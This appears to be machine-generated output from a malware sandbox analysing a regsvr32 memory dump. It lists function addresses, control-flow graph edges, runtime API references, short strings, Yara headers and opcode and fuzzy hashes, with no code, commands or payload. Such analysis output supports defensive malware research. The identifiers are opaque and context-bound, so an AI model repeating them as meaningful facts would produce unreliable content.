                  control_flow_graph 96 223d274-223d283 call 223d250 99 223d296-223d2cb call 223d1e0 ExitProcess 96->99 100 223d285-223d28e 96->100 105 223d317-223d358 call 223d43c 99->105 106 223d2cd-223d2d8 99->106 100->99 111 223d365-223d367 call 223d274 105->111 112 223d35a-223d364 105->112 106->105 110 223d2da-223d2e2 106->110 110->105 113 223d2e4-223d2f1 110->113 116 223d36c-223d36f 111->116 113->105 115 223d2f3-223d2fc 113->115 115->105 117 223d2fe-223d305 115->117 117->105 118 223d307-223d30e 117->118 118->105 119 223d310-223d312 call 223d1e0 118->119 119->105
                  APIs
                  • ExitProcess.KERNEL32(?,?,?,?,?,?,00000004,0223D36C), ref: 0223D29F
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: 83775a422325cb061dd29d8490b154c16ce4811a866643c6ee45823764a3e1be
                  • Instruction ID: c34356d85fe502a1b5956ccf68c26b417c2159f45d41f58e7fa31ad8e28ed4ad
                  • Opcode Fuzzy Hash: 83775a422325cb061dd29d8490b154c16ce4811a866643c6ee45823764a3e1be
                  • Instruction Fuzzy Hash: C1316BB0910B0E8BDF15EFA488886ED77B1FB58308F04453AD40AD7295EB75C985CB81

                  Non-executed Functions

                  Function 02236F30 Relevance: 8.1, Strings: 1, Instructions: 6827COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 968 2236f30-2237537 969 2237543-2237944 968->969 970 2237539-223753d 968->970 973 2237960-2237f20 969->973 974 2237946-223794e 969->974 970->969 971 2237950-223795b 970->971 971->969 976 2237f22-2237f27 973->976 977 2237f2d-2237f38 973->977 974->971 974->973 976->977 978 223a8f0 976->978 979 2237f40-2237f45 977->979 978->978 980 223a8f2-223a902 979->980 981 2237f4b-2238e1d 979->981 982 2238e23-2238e32 981->982 983 223a2c7-223a321 981->983 982->983 984 2238e38 982->984 985 223a323-223a332 983->985 986 223a39f-223a3b0 983->986 987 2238e40-223a2b7 984->987 988 223a382-223a388 985->988 989 223a334-223a368 985->989 990 223a3b2-223a3db 986->990 987->983 991 223a2b9-223a2c1 987->991 993 223a38f-223a39d 988->993 989->990 992 223a36a-223a380 989->992 990->993 994 223a3dd-223a8d4 990->994 991->983 991->987 992->988 993->986 994->979 995 223a8da-223a8df 994->995 995->979 996 223a8e5-223a8ef 995->996 996->978
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: vyTn
                  • API String ID: 0-1089316748
                  • Opcode ID: ac73c6055c85f12ac252a6679bea8b96955aaa643fb23d62653498d36e1fd4e8
                  • Instruction ID: 499dcec78f24170e5d0efe6d38fad6ec483613e0c81b24841d7532f76a5a8869
                  • Opcode Fuzzy Hash: ac73c6055c85f12ac252a6679bea8b96955aaa643fb23d62653498d36e1fd4e8
                  • Instruction Fuzzy Hash: FE73925BBB55100BBB0C887A99A33E323C3D3A7729F29B63D85E3C3693D85E480B5545
                  Function 022498E8 Relevance: 1.8, APIs: 1, Instructions: 321COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _clrfp
                  • String ID:
                  • API String ID: 3618594692-0
                  • Opcode ID: 0825bef10224c9187826c5c0cc1e92805fa228d677d99d5450349513bd5de2ce
                  • Instruction ID: 9a2c12c5fdbe68a870605ea218139f0d65f18801693b71275128f8782e5a1bb0
                  • Opcode Fuzzy Hash: 0825bef10224c9187826c5c0cc1e92805fa228d677d99d5450349513bd5de2ce
                  • Instruction Fuzzy Hash: 2EB17A30520A5E8FDB9DCF1CC88AB5677E0FF49318F198599E899CB265C735D892CB01
                  Function 0223A391 Relevance: 1.8, Strings: 1, Instructions: 504COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: vyTn
                  • API String ID: 0-1089316748
                  • Opcode ID: fee1ff493de0a62dfbd6c4a6402f45fc275154e1010e7b9f75b7645ba25e9ffc
                  • Instruction ID: d0e3aa63879acfc99c25af0c0feb1ec41bb5935efd424e6cedd1358327629424
                  • Opcode Fuzzy Hash: fee1ff493de0a62dfbd6c4a6402f45fc275154e1010e7b9f75b7645ba25e9ffc
                  • Instruction Fuzzy Hash: 97C13A9BBB8A080B6B0C98BA5C973F726C3D3E5709B1DF13D4997D7145ECAD884B1144
                  Function 02242B28 Relevance: .4, Instructions: 365COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c16bb679460c2f365bd65fc238876c35270d3ccb8e22677241c934e6b682caf3
                  • Instruction ID: c07f4953206a69ffcf429613873a8573afbce264ef1f6de272fcee3660162c32
                  • Opcode Fuzzy Hash: c16bb679460c2f365bd65fc238876c35270d3ccb8e22677241c934e6b682caf3
                  • Instruction Fuzzy Hash: 2EB10830638B498FDB2DDBB9988427D77D2FB84710F54475EF886C3199DF6098828A82
                  Function 022429A4 Relevance: .3, Instructions: 343COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _invalid_parameter_noinfo
                  • String ID:
                  • API String ID: 3215553584-0
                  • Opcode ID: ae3c69de23f64a5eb9535b7f532c30bd7227b1e0e72a963f417f84bb1cc622e0
                  • Instruction ID: 71435476067e34cf9054a21acc42410fc0db319e19c0a64c0d27bb1ec9854553
                  • Opcode Fuzzy Hash: ae3c69de23f64a5eb9535b7f532c30bd7227b1e0e72a963f417f84bb1cc622e0
                  • Instruction Fuzzy Hash: E091083063CF0D8FD72CEFB99849276B7D2FB84710B50471EE89AC3255DE6098428682
                  Function 0223DA00 Relevance: .2, Instructions: 219COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4f629496b896a9729be065d4d22f8e3c8e85d13c0d28e00766ea6a5fa37adc5c
                  • Instruction ID: 325174c8a6eb805a5473ce2de8be57a6bb12878e64901de9e9125f83cfab3f19
                  • Opcode Fuzzy Hash: 4f629496b896a9729be065d4d22f8e3c8e85d13c0d28e00766ea6a5fa37adc5c
                  • Instruction Fuzzy Hash: 6A51C132328E094F9B1CDEACD49867573E3F7AC314315822EE40ED72A9DA74E9468785
                  Function 02246C48 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 463COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 499 2246c48-2246caf call 2246070 502 2246cb5-2246cb8 499->502 503 2247110-2247117 call 223e49c 499->503 502->503 504 2246cbe-2246cc4 502->504 506 2246d93-2246da5 504->506 507 2246cca-2246cce 504->507 509 2247060-2247064 506->509 510 2246dab-2246daf 506->510 507->506 511 2246cd4-2246cdf 507->511 514 2247066-224706d 509->514 515 224709d-22470a7 call 223e560 509->515 510->509 512 2246db5-2246dc0 510->512 511->506 513 2246ce5-2246cea 511->513 512->509 516 2246dc6-2246dcd 512->516 513->506 517 2246cf0-2246cfa call 223e560 513->517 514->503 518 2247073-2247098 call 22471ec 514->518 515->503 528 22470a9-22470c8 call 2242430 515->528 520 2246f91-2246f9d 516->520 521 2246dd3-2246e0e call 2241334 516->521 517->528 532 2246d00-2246d2b call 223e560 * 2 call 22414a8 517->532 518->515 520->515 525 2246fa3-2246fa7 520->525 521->520 537 2246e14-2246e1e 521->537 529 2246fb7-2246fbf 525->529 530 2246fa9-2246fb5 call 2241468 525->530 529->515 536 2246fc5-2246fd2 call 22410d0 529->536 530->529 543 2246fd8-2246fe0 530->543 565 2246d2d-2246d31 532->565 566 2246d4b-2246d55 call 223e560 532->566 536->515 536->543 541 2246e22-2246e54 537->541 545 2246f80-2246f87 541->545 546 2246e5a-2246e66 541->546 548 2246fe6-2246fea 543->548 549 22470f3-224710f call 223e560 * 2 call 223e300 543->549 545->541 552 2246f8d-2246f8e 545->552 546->545 550 2246e6c-2246e85 546->550 553 2246fec-2246ffb call 2241468 548->553 554 2246ffd-2246ffe 548->554 549->503 556 2246f7d-2246f7e 550->556 557 2246e8b-2246ed0 call 2241494 * 2 550->557 552->520 562 2247000-224700a call 2246490 553->562 554->562 556->545 581 2246ed2-2246ef8 call 2241494 call 2246610 557->581 582 2246f0e-2246f14 557->582 562->515 577 2247010-224705e call 2241160 call 2241230 562->577 565->566 572 2246d33-2246d3e 565->572 566->506 584 2246d57-2246d77 call 223e560 * 2 call 2246490 566->584 572->566 578 2246d40-2246d45 572->578 577->515 578->503 578->566 598 2246f1f-2246f73 call 2247118 581->598 599 2246efa-2246f0c 581->599 588 2246f16-2246f1a 582->588 589 2246f78-2246f79 582->589 603 2246d8e-2246d8f 584->603 604 2246d79-2246d83 call 2246580 584->604 588->557 589->556 598->589 599->581 599->582 603->506 607 22470ed-22470f2 call 223e300 604->607 608 2246d89-22470ec call 223cd68 call 224639c call 22488f8 604->608 607->549 608->607
                  APIs
                  • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 02246CA4
                    • Part of subcall function 02246070: __GetUnwindTryBlock.LIBCMT ref: 022460B3
                    • Part of subcall function 02246070: __SetUnwindTryBlock.LIBVCRUNTIME ref: 022460D8
                  • Is_bad_exception_allowed.LIBVCRUNTIME ref: 02246D7C
                  • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 02246FCB
                  • std::bad_alloc::bad_alloc.LIBCMT ref: 022470D7
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Yara matches
                  Similarity
                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                  • String ID: csm$csm$csm
                  • API String ID: 849930591-393685449
                  • Opcode ID: e8baff4eaddff286641c296b0cc926b9b4bc7b24fb057b1799d8bb4c2e678a60
                  • Instruction ID: f6e58f06177f1c5b57df6ad195542c3e25207210649056ffa1eab013b0046b9a
                  • Opcode Fuzzy Hash: e8baff4eaddff286641c296b0cc926b9b4bc7b24fb057b1799d8bb4c2e678a60
                  • Instruction Fuzzy Hash: D8E19270928B098FDB28EFA8C4857A9B7E1FF59314F50165EE489D7219DF30E485CB82
                  Function 02246608 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 997 2246608-2246a58 call 223e464 call 223e560 1003 2246a92-2246a96 997->1003 1004 2246a5a-2246a60 997->1004 1005 2246a9c-2246aa0 1003->1005 1006 2246b2a-2246b2e 1003->1006 1004->1003 1007 2246a62-2246a64 1004->1007 1008 2246aa6-2246aae 1005->1008 1009 2246c21 1005->1009 1010 2246b30-2246b3c 1006->1010 1011 2246b72-2246b78 1006->1011 1012 2246a76-2246a78 1007->1012 1013 2246a66-2246a6a 1007->1013 1008->1009 1014 2246ab4-2246ab8 1008->1014 1017 2246c26-2246c40 1009->1017 1015 2246b52-2246b5e 1010->1015 1016 2246b3e-2246b42 1010->1016 1020 2246be8-2246c1c call 2246c48 1011->1020 1021 2246b7a-2246b7e 1011->1021 1012->1003 1019 2246a7a-2246a86 1012->1019 1018 2246a6c-2246a74 1013->1018 1013->1019 1023 2246b17-2246b25 call 22410fc 1014->1023 1024 2246aba-2246abc 1014->1024 1015->1009 1027 2246b64-2246b6c 1015->1027 1016->1015 1025 2246b44-2246b50 call 2241468 1016->1025 1018->1003 1018->1012 1019->1003 1022 2246a88-2246a8c 1019->1022 1020->1009 1021->1020 1028 2246b80-2246b87 1021->1028 1022->1003 1022->1009 1023->1009 1031 2246af5-2246af7 1024->1031 1032 2246abe-2246ad0 call 2245de0 1024->1032 1025->1011 1025->1015 1027->1009 1027->1011 1028->1020 1029 2246b89-2246b91 1028->1029 1029->1020 1034 2246b93-2246ba6 call 2241494 1029->1034 1031->1023 1038 2246af9-2246b01 1031->1038 1040 2246c41-2246c47 call 223e49c 1032->1040 1045 2246ad6-2246ad9 1032->1045 1034->1020 1048 2246ba8-2246be6 1034->1048 1039 2246b07-2246b0b 1038->1039 1038->1040 1039->1040 1043 2246b11-2246b15 1039->1043 1047 2246ae5-2246af0 call 2245ee4 1043->1047 1045->1040 1049 2246adf-2246ae3 1045->1049 1047->1009 1048->1017 1049->1047
                  APIs
                  • __except_validate_context_record.LIBVCRUNTIME ref: 02246A38
                  • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 02246B20
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                  • String ID: csm$csm
                  • API String ID: 3896166516-3733052814
                  • Opcode ID: b5fe93b38fdbb449a8dcda3059ceade28013aff72cb2c9cf4c45be8ccc589a34
                  • Instruction ID: c57d1e648e86c1fb15fbef30cbbe31dfc3f6bbd31c4f082c0379535bf199dc34
                  • Opcode Fuzzy Hash: b5fe93b38fdbb449a8dcda3059ceade28013aff72cb2c9cf4c45be8ccc589a34
                  • Instruction Fuzzy Hash: A9615C30628B0A8FCB6CDFA8C088374B7E5FB59319F64865AD489C7659DF74D881CB42
                  Function 02246750 Relevance: 6.3, APIs: 4, Instructions: 309COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1111 2246750-224677b 1112 224678c-2246790 1111->1112 1113 224677d-224678a call 2241468 1111->1113 1115 2246792-2246795 1112->1115 1113->1115 1117 2246912 1115->1117 1118 224679b-224679e 1115->1118 1121 2246914-224692d 1117->1121 1119 22467a0-22467af call 2241468 1118->1119 1120 22467b1-22467b2 1118->1120 1123 22467b4-22467b8 1119->1123 1120->1123 1123->1117 1125 22467be-22467c1 1123->1125 1126 22467c3-22467c5 1125->1126 1127 22467cb-22467cd 1125->1127 1126->1117 1126->1127 1128 22467cf-22467d7 1127->1128 1129 22467d9-22467dc 1127->1129 1128->1129 1130 2246810-2246813 1129->1130 1131 22467de-22467e2 1129->1131 1133 2246815-224682e 1130->1133 1134 2246830-2246834 1130->1134 1131->1130 1132 22467e4-22467ee 1131->1132 1132->1130 1135 22467f0-22467f9 1132->1135 1146 224686f-224687b call 223ce40 1133->1146 1137 2246836-224685d call 2249d30 1134->1137 1138 2246880-2246884 1134->1138 1149 224692e-2246970 call 223e49c * 2 1135->1149 1150 22467ff-2246802 1135->1150 1162 2246863-2246866 1137->1162 1163 224690e-2246910 1137->1163 1139 2246895-2246898 1138->1139 1140 2246886-2246893 call 2241494 1138->1140 1145 224689a-224689d 1139->1145 1140->1145 1152 22468d3-22468e0 1145->1152 1153 224689f-22468d1 call 223ce40 call 2249d30 1145->1153 1146->1163 1180 2246977-224697c 1149->1180 1181 2246972-2246975 1149->1181 1150->1149 1159 2246808-224680e 1150->1159 1168 22468e2-22468f1 call 2241494 1152->1168 1169 22468f3-22468f4 1152->1169 1153->1163 1159->1146 1162->1163 1167 224686c-224686d 1162->1167 1163->1121 1167->1146 1174 22468f6-224690a 1168->1174 1169->1174 1174->1163 1182 224697e-2246986 call 2246750 1180->1182 1181->1182 1185 22469c4-22469d7 call 223ce40 1182->1185 1186 2246988-224698b 1182->1186 1192 22469e5-22469f3 call 22462f4 1185->1192 1193 22469d9-22469e3 call 2241494 1185->1193 1188 22469f4-2246a09 1186->1188 1189 224698d-22469a0 call 223ce40 1186->1189 1197 22469a2-22469ac call 2241494 1189->1197 1198 22469ae-22469c2 call 2246300 1189->1198 1192->1188 1193->1192 1197->1198 1198->1188
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AdjustPointer
                  • String ID:
                  • API String ID: 1740715915-0
                  • Opcode ID: af3458985603ad7ce2524011c1902c71dc37048d60be4bde5190f5d8f215ae27
                  • Instruction ID: 410f7a83b82ea0c6deae667fbfdde7dd06512d1972f0ee7f6e9b10847cc89d40
                  • Opcode Fuzzy Hash: af3458985603ad7ce2524011c1902c71dc37048d60be4bde5190f5d8f215ae27
                  • Instruction Fuzzy Hash: FB81A130538F1B8B9B3DAFA88050275B3E5FB9A714B98066ED44AC315DDFB0D885CB81
                  Function 0223CB50 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1205 223cb50-223cb96 call 223e464 1208 223cc8d-223cc94 1205->1208 1209 223cb9c-223cba6 1205->1209 1211 223cd38-223cd3e 1208->1211 1210 223cc79-223cc7b 1209->1210 1212 223cc81 1210->1212 1213 223cbab-223cbb9 1210->1213 1214 223cd44 1211->1214 1215 223cc99-223cca7 1211->1215 1212->1214 1216 223cc77 1213->1216 1217 223cbbf-223cbc6 1213->1217 1220 223cd49-223cd66 1214->1220 1218 223cd36 1215->1218 1219 223ccad-223ccb5 1215->1219 1216->1210 1217->1216 1221 223cbcc-223cbd1 1217->1221 1218->1211 1219->1218 1222 223ccb7-223ccbb 1219->1222 1221->1216 1223 223cbd7-223cbdc 1221->1223 1224 223ccbd-223ccc2 1222->1224 1225 223ccfc-223cd0d 1222->1225 1226 223cbf9-223cbff 1223->1226 1227 223cbde-223cbf1 1223->1227 1230 223ccc4-223ccd0 1224->1230 1231 223ccf8-223ccfa 1224->1231 1228 223cd1f-223cd33 1225->1228 1229 223cd0f-223cd15 1225->1229 1235 223cc01-223cc09 1226->1235 1236 223cc29-223cc72 call 223e430 call 223e460 1226->1236 1244 223cbf7 1227->1244 1245 223cc86-223cc88 1227->1245 1228->1218 1229->1218 1234 223cd17-223cd1b 1229->1234 1232 223ccd2-223ccd9 1230->1232 1233 223ccf1-223ccf6 1230->1233 1231->1214 1231->1225 1232->1233 1237 223ccdb-223cce4 1232->1237 1233->1230 1233->1231 1234->1214 1240 223cd1d 1234->1240 1235->1236 1241 223cc0b-223cc19 call 223e3b0 1235->1241 1236->1216 1237->1233 1242 223cce6-223ccef 1237->1242 1240->1218 1241->1236 1249 223cc1b-223cc21 1241->1249 1242->1231 1242->1233 1244->1216 1244->1226 1245->1220 1249->1236
                  APIs
                  • __except_validate_context_record.LIBVCRUNTIME ref: 0223CB7B
                  • _IsNonwritableInCurrentImage.LIBCMT ref: 0223CC12
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentImageNonwritable__except_validate_context_record
                  • String ID: csm
                  • API String ID: 3242871069-1018135373
                  • Opcode ID: 28f9c21a248c6750ff56b9987a7044b6f6882288d8c0aceccd40688c18a955a4
                  • Instruction ID: 75387e7a1c1c3d734609b8cb522a22be0224ff6491c4b8446bc6a961eba3f0ce
                  • Opcode Fuzzy Hash: 28f9c21a248c6750ff56b9987a7044b6f6882288d8c0aceccd40688c18a955a4
                  • Instruction Fuzzy Hash: F961D470228B098BCF29EF9CD485A7477D1FB58354B10496FE886D726AEB30E851CB85
                  Function 022471EC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1251 22471ec-224721f 1252 2247225-2247247 call 223e560 1251->1252 1253 2247438-2247452 1251->1253 1256 22472a4-22472b6 1252->1256 1257 2247249-224725d call 223e560 1252->1257 1258 2247453-224745b call 223e49c 1256->1258 1259 22472bc-2247300 call 2241334 1256->1259 1257->1256 1269 224725f-2247265 1257->1269 1259->1253 1266 2247306-2247311 1259->1266 1268 2247318-2247353 1266->1268 1271 2247417-2247432 1268->1271 1272 2247359-2247365 1268->1272 1269->1256 1270 2247267-224726d 1269->1270 1270->1256 1273 224726f-224729e call 22415d8 1270->1273 1271->1253 1271->1268 1272->1271 1274 224736b-2247390 1272->1274 1273->1253 1273->1256 1276 2247392-224739e call 2241468 1274->1276 1277 22473c3-22473c6 1274->1277 1283 22473a0-22473a3 1276->1283 1284 22473bb-22473bc 1276->1284 1277->1271 1279 22473c8-2247412 call 2247118 1277->1279 1279->1271 1285 22473a5-22473b1 call 2241468 1283->1285 1286 22473b3 1283->1286 1284->1277 1288 22473b5-22473b9 1285->1288 1286->1288 1288->1271 1288->1284
                  APIs
                  • _CallSETranslator.LIBVCRUNTIME ref: 02247297
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Offset: 02201000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_2201000_regsvr32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CallTranslator
                  • String ID: MOC$RCC
                  • API String ID: 3163161869-2084237596
                  • Opcode ID: 2b0857dc7f466c401f9652ed94ee3215145e256993a502d5bc3a495471cbec0f
                  • Instruction ID: c9cb6fb7569fdb71e0a805c881d9155433fbb1ae3b83056114398c0b75fda638
                  • Opcode Fuzzy Hash: 2b0857dc7f466c401f9652ed94ee3215145e256993a502d5bc3a495471cbec0f
                  • Instruction Fuzzy Hash: 9E71AF30528B488FD729EF58C446BA9BBE0FB99314F444A5EE899C3215DB74E481CB82